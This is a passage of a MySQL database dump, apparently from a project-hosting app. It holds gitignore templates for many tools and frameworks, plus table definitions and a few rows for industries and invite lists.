atest/*\n/administrator/modules/mod_logged/*\n/administrator/modules/mod_login/*\n/administrator/modules/mod_menu/*\n/administrator/modules/mod_multilangstatus/*\n/administrator/modules/mod_online/*\n/administrator/modules/mod_popular/*\n/administrator/modules/mod_quickicon/*\n/administrator/modules/mod_status/*\n/administrator/modules/mod_submenu/*\n/administrator/modules/mod_title/*\n/administrator/modules/mod_toolbar/*\n/administrator/modules/mod_unread/*\n/administrator/modules/mod_version/*\n/administrator/modules/mod_stats_admin/*\n/administrator/templates/isis/*\n/administrator/templates/hathor/*\n/administrator/templates/system/*\n/administrator/index.php\n/cache/*\n/bin/*\n/cli/*\n/components/com_banners/*\n/components/com_ajax/*\n/components/com_config/*\n/components/com_contenthistory/*\n/components/com_tags/*\n/components/com_contact/*\n/components/com_content/*\n/components/com_finder/*\n/components/com_mailto/*\n/components/com_media/*\n/components/com_modules/*\n/components/com_newsfeeds/*\n/components/com_search/*\n/components/com_users/*\n/components/com_wrapper/*\n/components/index.html\n/images/banners/*\n/images/headers/*\n/images/sampledata/*\n/images/joomla*\n/images/index.html\n/images/powered_by.png\n/includes/*\n/installation/*\n/language/en-GB/en-GB.com_ajax.ini\n/language/en-GB/en-GB.com_config.ini\n/language/en-GB/en-GB.com_contact.ini\n/language/en-GB/en-GB.com_finder.ini\n/language/en-GB/en-GB.com_tags.ini\n/language/en-GB/en-GB.finder_cli.ini\n/language/en-GB/en-GB.lib_fof.sys.ini\n/language/en-GB/en-GB.lib_fof.ini\n/language/en-GB/en-GB.com_content.ini\n/language/en-GB/en-GB.lib_idna_convert.sys.ini\n/language/en-GB/en-GB.com_mailto.ini\n/language/en-GB/en-GB.lib_joomla.sys.ini\n/language/en-GB/en-GB.lib_phpass.sys.ini\n/language/en-GB/en-GB.lib_phpmailer.sys.ini\n/language/en-GB/en-GB.lib_phputf8.sys.ini\n/language/en-GB/en-GB.lib_simplepie.sys.ini\n/language/en-GB/en-GB.com_media.ini\n/language/en-GB/en-GB.mod_finder.ini\n/language/en-GB/en-GB.com_messages.ini\n/language/en-GB/en-GB.mod_tags_popular.ini\n/language/en-GB/en-GB.mod_tags_popular.sys.ini\n/language/en-GB/en-GB.mod_tags_similar.ini\n/language/en-GB/en-GB.mod_tags_similar.sys.ini\n/language/en-GB/en-GB.mod_finder.sys.ini\n/language/en-GB/en-GB.tpl_beez3.ini\n/language/en-GB/en-GB.tpl_beez3.sys.ini\n/language/en-GB/en-GB.com_newsfeeds.ini\n/language/en-GB/en-GB.tpl_protostar.ini\n/language/en-GB/en-GB.tpl_protostar.sys.ini\n/language/en-GB/en-GB.com_search.ini\n/language/en-GB/en-GB.com_users.ini\n/language/en-GB/en-GB.com_weblinks.ini\n/language/en-GB/en-GB.com_wrapper.ini\n/language/en-GB/en-GB.files_joomla.sys.ini\n/language/en-GB/en-GB.ini\n/language/en-GB/en-GB.lib_joomla.ini\n/language/en-GB/en-GB.localise.php\n/language/en-GB/en-GB.mod_articles_archive.ini\n/language/en-GB/en-GB.mod_articles_archive.sys.ini\n/language/en-GB/en-GB.mod_articles_categories.ini\n/language/en-GB/en-GB.mod_articles_categories.sys.ini\n/language/en-GB/en-GB.mod_articles_category.ini\n/language/en-GB/en-GB.mod_articles_category.sys.ini\n/language/en-GB/en-GB.mod_articles_latest.ini\n/language/en-GB/en-GB.mod_articles_latest.sys.ini\n/language/en-GB/en-GB.mod_articles_news.ini\n/language/en-GB/en-GB.mod_articles_news.sys.ini\n/language/en-GB/en-GB.mod_articles_popular.ini\n/language/en-GB/en-GB.mod_articles_popular.sys.ini\n/language/en-GB/en-GB.mod_banners.ini\n/language/en-GB/en-GB.mod_banners.sys.ini\n/language/en-GB/en-GB.mod_breadcrumbs.ini\n/language/en-GB/en-GB.mod_breadcrumbs.sys.ini\n/language/en-GB/en-GB.mod_custom.ini\n/language/en-GB/en-GB.mod_custom.sys.ini\n/language/en-GB/en-GB.mod_feed.ini\n/language/en-GB/en-GB.mod_feed.sys.ini\n/language/en-GB/en-GB.mod_footer.ini\n/language/en-GB/en-GB.mod_footer.sys.ini\n/language/en-GB/en-GB.mod_languages.ini\n/language/en-GB/en-GB.mod_languages.sys.ini\n/language/en-GB/en-GB.mod_login.ini\n/language/en-GB/en-GB.mod_login.sys.ini\n/language/en-GB/en-GB.mod_menu.ini\n/language/en-GB/en-GB.mod_menu.sys.ini\n/language/en-GB/en-GB.mod_random_image.ini\n/language/en-GB/en-GB.mod_random_image.sys.ini\n/language/en-GB/en-GB.mod_related_items.ini\n/language/en-GB/en-GB.mod_related_items.sys.ini\n/language/en-GB/en-GB.mod_search.ini\n/language/en-GB/en-GB.mod_search.sys.ini\n/language/en-GB/en-GB.mod_stats.ini\n/language/en-GB/en-GB.mod_stats.sys.ini\n/language/en-GB/en-GB.mod_syndicate.ini\n/language/en-GB/en-GB.mod_syndicate.sys.ini\n/language/en-GB/en-GB.mod_users_latest.ini\n/language/en-GB/en-GB.mod_users_latest.sys.ini\n/language/en-GB/en-GB.mod_weblinks.ini\n/language/en-GB/en-GB.mod_weblinks.sys.ini\n/language/en-GB/en-GB.mod_whosonline.ini\n/language/en-GB/en-GB.mod_whosonline.sys.ini\n/language/en-GB/en-GB.mod_wrapper.ini\n/language/en-GB/en-GB.mod_wrapper.sys.ini\n/language/en-GB/en-GB.tpl_atomic.ini\n/language/en-GB/en-GB.tpl_atomic.sys.ini\n/language/en-GB/en-GB.tpl_beez_20.ini\n/language/en-GB/en-GB.tpl_beez_20.sys.ini\n/language/en-GB/en-GB.tpl_beez5.ini\n/language/en-GB/en-GB.tpl_beez5.sys.ini\n/language/en-GB/en-GB.xml\n/language/en-GB/install.xml\n/language/overrides/*\n/language/index.html\n/layouts/joomla/*\n/layouts/libraries/*\n/layouts/plugins/*\n/layouts/index.html\n/libraries/cms.php\n/libraries/cms/*\n/libraries/fof/*\n/libraries/idna_convert/*\n/libraries/joomla/*\n/libraries/legacy/*\n/libraries/php-encryption/*\n/libraries/phpass/*\n/libraries/phpmailer/*\n/libraries/phputf8/*\n/libraries/simplepie/*\n/libraries/vendor/*\n/libraries/classmap.php\n/libraries/import.legacy.php\n/libraries/index.html\n/libraries/import.php\n/libraries/loader.php\n/media/cms/*\n/media/com_contenthistory/*\n/media/com_finder/*\n/media/com_joomlaupdate/*\n/media/com_wrapper/*\n/media/contacts/*\n/media/editors/*\n/media/jui/*\n/media/mailto/*\n/media/media/*\n/media/mod_languages/*\n/media/overrider/*\n/media/plg_captcha_recaptcha/*\n/media/plg_quickicon_extensionupdate/*\n/media/plg_quickicon_joomlaupdate/*\n/media/plg_system_highlight/*\n/media/plg_system_stats/*\n/media/system/*\n/media/index.html\n/modules/mod_articles_archive/*\n/modules/mod_articles_categories/*\n/modules/mod_articles_category/*\n/modules/mod_articles_latest/*\n/modules/mod_articles_news/*\n/modules/mod_articles_popular/*\n/modules/mod_banners/*\n/modules/mod_breadcrumbs/*\n/modules/mod_custom/*\n/modules/mod_feed/*\n/modules/mod_finder/*\n/modules/mod_footer/*\n/modules/mod_languages/*\n/modules/mod_login/*\n/modules/mod_menu/*\n/modules/mod_random_image/*\n/modules/mod_related_items/*\n/modules/mod_search/*\n/modules/mod_stats/*\n/modules/mod_syndicate/*\n/modules/mod_tags_popular/*\n/modules/mod_tags_similar/*\n/modules/mod_users_latest/*\n/modules/mod_whosonline/*\n/modules/mod_wrapper/*\n/modules/index.html\n/plugins/authentication/example/*\n/plugins/authentication/gmail/*\n/plugins/authentication/joomla/*\n/plugins/authentication/ldap/*\n/plugins/authentication/cookie/*\n/plugins/captcha/recaptcha/*\n/plugins/content/emailcloak/*\n/plugins/content/example/*\n/plugins/content/finder/*\n/plugins/content/geshi/*\n/plugins/content/joomla/*\n/plugins/content/loadmodule/*\n/plugins/content/pagebreak/*\n/plugins/content/pagenavigation/*\n/plugins/content/vote/*\n/plugins/content/contact/*\n/plugins/editors/codemirror/*\n/plugins/editors/none/*\n/plugins/editors/tinymce/*\n/plugins/editors-xtd/module/*\n/plugins/editors-xtd/article/*\n/plugins/editors-xtd/image/*\n/plugins/editors-xtd/pagebreak/*\n/plugins/editors-xtd/readmore/*\n/plugins/extension/example/*\n/plugins/extension/joomla/*\n/plugins/finder/categories/*\n/plugins/finder/contacts/*\n/plugins/finder/content/*\n/plugins/finder/newsfeeds/*\n/plugins/finder/tags/*\n/plugins/installer/*\n/plugins/quickicon/extensionupdate/*\n/plugins/quickicon/joomlaupdate/*\n/plugins/quickicon/index.html\n/plugins/search/categories/*\n/plugins/search/contacts/*\n/plugins/search/content/*\n/plugins/search/newsfeeds/*\n/plugins/search/weblinks/*\n/plugins/search/tags/*\n/plugins/search/index.html\n/plugins/system/cache/*\n/plugins/system/debug/*\n/plugins/system/highlight/*\n/plugins/system/languagecode/*\n/plugins/system/languagefilter/*\n/plugins/system/log/*\n/plugins/system/logout/*\n/plugins/system/p3p/*\n/plugins/system/redirect/*\n/plugins/system/remember/*\n/plugins/system/sef/*\n/plugins/system/stats/*\n/plugins/system/updatenotification/*\n/plugins/system/index.html\n/plugins/twofactorauth/*\n/plugins/user/contactcreator/*\n/plugins/user/example/*\n/plugins/user/joomla/*\n/plugins/user/profile/*\n/plugins/user/index.html\n/plugins/index.html\n/templates/beez3/*\n/templates/protostar/*\n/templates/system/*\n/templates/index.html\n/tmp/*\n/configuration.php\n/index.php\n/joomla.xml\n/*.txt\n/robots.txt.dist\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(158,'Terraform','# Local .terraform directories\n**/.terraform/*\n\n# .tfstate files\n*.tfstate\n*.tfstate.*\n\n# Crash log files\ncrash.log\n\n# Ignore any .tfvars files that are generated automatically for each Terraform run. Most\n# .tfvars files are managed as part of configuration and so should be included in\n# version control.\n#\n# example.tfvars\n\n# Ignore override files as they are usually used to override resources locally and so\n# are not checked in\noverride.tf\noverride.tf.json\n*_override.tf\n*_override.tf.json\n\n# Include override files you do wish to add to version control using negated pattern\n#\n# !example_override.tf\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(159,'OpenCart','.htaccess\n/config.php\nadmin/config.php\n\n!index.html\n\ndownload/\nimage/data/\nimage/cache/\nsystem/cache/\nsystem/logs/\n\nsystem/storage/\n\n# vQmod log files\nvqmod/logs/*\n# vQmod cache files\nvqmod/vqcache/*\nvqmod/checked.cache\nvqmod/mods.cache\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(160,'WebMethods','**/IntegrationServer/datastore/\n**/IntegrationServer/db/\n**/IntegrationServer/DocumentStore/\n**/IntegrationServer/lib/\n**/IntegrationServer/logs/\n**/IntegrationServer/replicate/\n**/IntegrationServer/sdk/\n**/IntegrationServer/support/\n**/IntegrationServer/update/\n**/IntegrationServer/userFtpRoot/\n**/IntegrationServer/web/\n**/IntegrationServer/WmRepository4/\n**/IntegrationServer/XAStore/\n**/IntegrationServer/packages/Wm*/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(161,'Gcov','# gcc coverage testing tool files\n\n*.gcno\n*.gcda\n*.gcov\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(162,'SCons','# for projects that use SCons for building: http://http://www.scons.org/\n.sconsign.dblite\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(163,'Backup','*.bak\n*.gho\n*.ori\n*.orig\n*.tmp\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(164,'Emacs','# -*- mode: gitignore; -*-\n*~\n\\#*\\#\n/.emacs.desktop\n/.emacs.desktop.lock\n*.elc\nauto-save-list\ntramp\n.\\#*\n\n# Org-mode\n.org-id-locations\n*_archive\n\n# flymake-mode\n*_flymake.*\n\n# eshell files\n/eshell/history\n/eshell/lastdir\n\n# elpa packages\n/elpa/\n\n# reftex files\n*.rel\n\n# AUCTeX auto folder\n/auto/\n\n# cask packages\n.cask/\ndist/\n\n# Flycheck\nflycheck_*.el\n\n# server auth directory\n/server/\n\n# projectiles files\n.projectile\n\n# directory configuration\n.dir-locals.el\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(165,'CVS','/CVS/*\n**/CVS/*\n.cvsignore\n*/.cvsignore\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(166,'ExpressionEngine','.DS_Store\n\n# Images\nimages/avatars/\nimages/captchas/\nimages/smileys/\nimages/member_photos/\nimages/signature_attachments/\nimages/pm_attachments/\n\n# For security do not publish the following files\nsystem/expressionengine/config/database.php\nsystem/expressionengine/config/config.php\n\n# Caches\nsized/\nthumbs/\n_thumbs/\n*/expressionengine/cache/*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(167,'Agda','*.agdai\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(168,'Tags','# Ignore tags created by etags, ctags, gtags (GNU global) and cscope\nTAGS\n.TAGS\n!TAGS/\ntags\n.tags\n!tags/\ngtags.files\nGTAGS\nGRTAGS\nGPATH\nGSYMS\ncscope.files\ncscope.out\ncscope.in.out\ncscope.po.out\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(169,'VVVV','\n# .v4p backup files\n*~.xml\n\n# Dynamic plugins .dll\nbin/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(170,'Scheme','*.ss~\n*.ss#*\n.#*.ss\n\n*.scm~\n*.scm#*\n.#*.scm\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(171,'Kotlin','# Compiled class file\n*.class\n\n# Log file\n*.log\n\n# BlueJ files\n*.ctxt\n\n# Mobile Tools for Java (J2ME)\n.mtj.tmp/\n\n# Package Files #\n*.jar\n*.war\n*.nar\n*.ear\n*.zip\n*.tar.gz\n*.rar\n\n# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml\nhs_err_pid*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(172,'SlickEdit','# SlickEdit workspace and project files are ignored by default because\n# typically they are considered to be developer-specific and not part of a\n# project.\n*.vpw\n*.vpj\n\n# SlickEdit workspace history and tag files always contain user-specific\n# data so they should not be stored in a repository.\n*.vpwhistu\n*.vpwhist\n*.vtg\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(173,'Archives','# It\'s better to unpack these files and commit the raw source because\n# git has its own built in compression methods.\n*.7z\n*.jar\n*.rar\n*.zip\n*.gz\n*.tgz\n*.bzip\n*.bz2\n*.xz\n*.lzma\n*.cab\n\n# Packing-only formats\n*.iso\n*.tar\n\n# Package management formats\n*.dmg\n*.xpi\n*.gem\n*.egg\n*.deb\n*.rpm\n*.msi\n*.msm\n*.msp\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(174,'Ansible','*.retry\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(175,'Kate','# Swap Files #\n.*.kate-swp\n.swp.*\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(176,'LabVIEW','# Libraries\n*.lvlibp\n*.llb\n\n# Shared objects (inc. Windows DLLs)\n*.dll\n*.so\n*.so.*\n*.dylib\n\n# Executables\n*.exe\n\n# Metadata\n*.aliases\n*.lvlps\n.cache/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(177,'Images','# JPEG\n*.jpg\n*.jpeg\n*.jpe\n*.jif\n*.jfif\n*.jfi\n\n# JPEG 2000\n*.jp2\n*.j2k\n*.jpf\n*.jpx\n*.jpm\n*.mj2\n\n# JPEG XR\n*.jxr\n*.hdp\n*.wdp\n\n# Graphics Interchange Format\n*.gif\n\n# RAW\n*.raw\n\n# Web P\n*.webp\n\n# Portable Network Graphics\n*.png\n\n# Animated Portable Network Graphics\n*.apng\n\n# Multiple-image Network Graphics\n*.mng\n\n# Tagged Image File Format\n*.tiff\n*.tif\n\n# Scalable Vector Graphics\n*.svg\n*.svgz\n\n# Portable Document Format\n*.pdf\n\n# X BitMap\n*.xbm\n\n# BMP\n*.bmp\n*.dib\n\n# ICO\n*.ico\n\n# 3D Images\n*.3dm\n*.max\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(178,'GWT','*.class\n\n# Package Files #\n*.jar\n*.war\n\n# gwt caches and compiled units #\nwar/gwt_bree/\ngwt-unitCache/\n\n# boilerplate generated classes #\n.apt_generated/\n\n# more caches and things from deploy #\nwar/WEB-INF/deploy/\nwar/WEB-INF/classes/\n\n#compilation logs\n.gwt/\n\n#gwt junit compilation files\nwww-test/\n\n#old GWT (1.5) created this dir\n.gwt-tmp/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(179,'Unity','[Ll]ibrary/\n[Tt]emp/\n[Oo]bj/\n[Bb]uild/\n[Bb]uilds/\nAssets/AssetStoreTools*\n\n# Visual Studio cache directory\n.vs/\n\n# Autogenerated VS/MD/Consulo solution and project files\nExportedObj/\n.consulo/\n*.csproj\n*.unityproj\n*.sln\n*.suo\n*.tmp\n*.user\n*.userprefs\n*.pidb\n*.booproj\n*.svd\n*.pdb\n*.opendb\n*.VC.db\n\n# Unity3D generated meta files\n*.pidb.meta\n*.pdb.meta\n\n# Unity3D Generated File On Crash Reports\nsysinfo.txt\n\n# Builds\n*.apk\n*.unitypackage\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(180,'Otto','.otto/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(181,'Perl','!Build/\n.last_cover_stats\n/META.yml\n/META.json\n/MYMETA.*\n*.o\n*.pm.tdy\n*.bs\n\n# Devel::Cover\ncover_db/\n\n# Devel::NYTProf\nnytprof.out\n\n# Dizt::Zilla\n/.build/\n\n# Module::Build\n_build/\nBuild\nBuild.bat\n\n# Module::Install\ninc/\n\n# ExtUtils::MakeMaker\n/blib/\n/_eumm/\n/*.gz\n/Makefile\n/Makefile.old\n/MANIFEST.bak\n/pm_to_blib\n/*.zip\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(182,'Stella','# Atari 2600 (Stella) support for multiple assemblers\n# - DASM\n# - CC65\n\n# Assembled binaries and object directories\nobj/\na.out\n*.bin\n*.a26\n\n# Add in special Atari 7800-based binaries for good measure\n*.a78\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(183,'VisualStudio','## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project\'s static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUNIT\n*.VisualState.xml\nTestResult.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.meta\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.log\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# JustCode is a .NET coding add-in\n.JustCode\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3\'s project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# JetBrains Rider\n.idea/\n*.sln.iml\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n__pycache__/\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik\'s JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(184,'CFWheels','# unpacked plugin folders\nplugins/**/*\n\n# files directory where uploads go\nfiles\n\n# DBMigrate plugin: generated SQL\ndb/sql\n\n# AssetBundler plugin: generated bundles\njavascripts/bundles\nstylesheets/bundles\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(185,'JetBrains','# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm\n# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839\n\n# User-specific stuff\n.idea/**/workspace.xml\n.idea/**/tasks.xml\n.idea/**/usage.statistics.xml\n.idea/**/dictionaries\n.idea/**/shelf\n\n# Generated files\n.idea/**/contentModel.xml\n\n# Sensitive or high-churn files\n.idea/**/dataSources/\n.idea/**/dataSources.ids\n.idea/**/dataSources.local.xml\n.idea/**/sqlDataSources.xml\n.idea/**/dynamic.xml\n.idea/**/uiDesigner.xml\n.idea/**/dbnavigator.xml\n\n# Gradle\n.idea/**/gradle.xml\n.idea/**/libraries\n\n# Gradle and Maven with auto-import\n# When using Gradle or Maven with auto-import, you should exclude module files,\n# since they will be recreated, and may cause churn. Uncomment if using\n# auto-import.\n# .idea/modules.xml\n# .idea/*.iml\n# .idea/modules\n\n# CMake\ncmake-build-*/\n\n# Mongo Explorer plugin\n.idea/**/mongoSettings.xml\n\n# File-based project format\n*.iws\n\n# IntelliJ\nout/\n\n# mpeltonen/sbt-idea plugin\n.idea_modules/\n\n# JIRA plugin\natlassian-ide-plugin.xml\n\n# Cursive Clojure plugin\n.idea/replstate.xml\n\n# Crashlytics plugin (for Android Studio and IntelliJ)\ncom_crashlytics_export_strings.xml\ncrashlytics.properties\ncrashlytics-build.properties\nfabric.properties\n\n# Editor-based Rest Client\n.idea/httpRequests\n\n# Android studio 3.1+ serialized cache file\n.idea/caches/build_file_checksums.ser\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(186,'Mercurial','.hg/\n.hgignore\n.hgsigs\n.hgsub\n.hgsubstate\n.hgtags\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(187,'Nim','nimcache/\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(188,'Perl6','# Gitignore for Perl 6 (http://www.perl6.org)\n# As part of https://github.com/github/gitignore\n\n# precompiled files\n.precomp\nlib/.precomp\n\n','2020-08-04 08:07:03','2020-08-04 08:07:03'),(189,'JDeveloper','# default application storage directory used by the IDE Performance Cache feature\n.data/\n\n# used for ADF styles caching\ntemp/\n\n# default output directories\nclasses/\ndeploy/\njavadoc/\n\n# lock file, a part of Oracle Credential Store Framework\ncwallet.sso.lck','2020-08-04 08:07:03','2020-08-04 08:07:03');
|
||
/*!40000 ALTER TABLE `ignores` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `industries`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `industries`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `industries` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT '1000',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`users_count` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_industries_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `industries`
|
||
--
|
||
|
||
LOCK TABLES `industries` WRITE;
|
||
/*!40000 ALTER TABLE `industries` DISABLE KEYS */;
|
||
INSERT INTO `industries` VALUES (1,'电子',1000,'2019-08-05 16:00:06','2019-08-05 16:00:06',0),(2,'互联网',1001,'2019-08-07 14:57:53','2019-08-07 14:57:53',0);
|
||
/*!40000 ALTER TABLE `industries` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `invite_lists`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `invite_lists`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `invite_lists` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`mail` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `invite_lists`
|
||
--
|
||
|
||
LOCK TABLES `invite_lists` WRITE;
|
||
/*!40000 ALTER TABLE `invite_lists` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `invite_lists` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `issue_categories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `issue_categories`;
|
||
